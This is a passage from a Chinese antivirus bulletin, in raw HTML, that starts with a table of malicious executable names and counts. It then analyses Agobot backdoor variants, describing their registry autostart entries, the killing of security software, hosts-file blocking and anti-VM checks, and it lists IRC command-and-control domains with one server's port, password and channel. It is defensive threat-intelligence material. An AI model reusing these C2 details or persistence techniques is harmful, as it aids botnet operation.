<DIV><FONT face=宋体><SPAN><SPAN id=L02380B8025B88FB3 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">218</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L02380BC027F09B76><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L02380C402A28A7B9 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L02380C802C60B43C title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">184</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L02380CC02E98C0FF><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L02380D4030D0CE42 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L02380D803308DBC5 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">146</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L02380DC03540E988><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L02380E403778F7CB title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname8.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L02380E8039B1064E title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">140</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L02380EC03BE91511><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L02380F403E212454 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad8.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L02380F80405933D7 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">113</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L02380FC04291439A><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L0238104044C953DD title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">winsystems.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0238108047016460 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">108</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L023810C049397523><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L023811404B718666 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard8.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L023811804DA997E9 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">71</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 118px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><br />
<DIV><FONT face=Arial><STRONG>技术分析</STRONG></FONT></DIV><SPAN><SPAN id=L023812404FE1AA2C title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L023812C05219BCEF><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L023813005451CFF2 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssave.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L023813405689E335 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot.chy</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L023813C058C1F6F8 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>大小99K，经过MEW压缩处理。</DIV><br />
<DIV> </DIV><br />
<DIV>1、病毒运行后，将自身复制到%SystemDir%文件夹，文件名随机。并在注册表创建启动项，指向病毒程序，如：</DIV><br />
<DIV>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Microsoft System Saver&#8221;=&#8221;flcnfm.exe&#8221;</DIV><br />
<DIV> </DIV><br />
<DIV>2、结束多种安全软件和病毒的进程，通过修改hosts文件，屏蔽多个安全网站</DIV><br />
<DIV>3、尝试连接多个IRC服务器接收黑客命令，这些IRC服务器有：</DIV><br />
<DIV>paper.no-ip.biz<BR>holdon.dyndns.org<BR>casi.blogdns.com<BR>comevisit.mentalstate.info<BR>itsthat.mentalstate.info<BR>whore.3xperienced.info<BR>urknot.3xperienced.info<BR>todayis.w33d420.be<BR>digital.w33d420.be<BR>hittin.w33d420.be<BR>billysmells.micr0s0cks.info<BR>buysome.micr0s0cks.info<BR>yes.micr0s0cks.info<BR>udontknow.makaveli7.be<BR>philosophe.makaveli7.be<BR>amalive.makaveli7.be<BR>tupac.makaveli7.be</DIV><br />
<DIV> </DIV><br />
<DIV>4、具有反调试功能，可以自动检测SoftICE、VMWare等环境，并向IRC服务器报告，有助于黑客屏蔽IP。</DIV><br />
<DIV> </DIV><br />
<DIV>5、通过多种漏洞传播。传播过程中发送大量数据包，可造成染毒计算机运行速度下降，局域网拥堵。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L023814005AFA0AFB title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L023814805D321F7E><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L023814C05F6A3441 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">extrmous.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0238150061A24944 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot.chv</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L0238158063DA5EC7 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\extrmous.exe, 262656字节</DIV><br />
<DIV><BR>2、在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Mouse Adaptor&#8221; = extrmous.exe<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;Mouse Adaptor&#8221; = extrmous.exe<BR>[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Mouse Adaptor&#8221; = extrmous.exe<BR>[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;Mouse Adaptor&#8221; = extrmous.exe<BR>这样，在Windows启动时，病毒就可以自动执行。</DIV><br />
<DIV> </DIV><br />
<DIV>3、连接IRC服务器n2.exceed-speed.info接收并执行黑客命令。</DIV><br />
<DIV>4、通过多种系统漏洞传播，可造成中毒计算机运行速度下降，局域网拥堵。</DIV><br />
<DIV> </DIV><br />
<DIV>botnet:</DIV><br />
<DIV>n2.exceed-speed.info:10002</DIV><br />
<DIV>PASS sooperdooper</DIV><br />
<DIV>JOIN #nextone# superbots</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
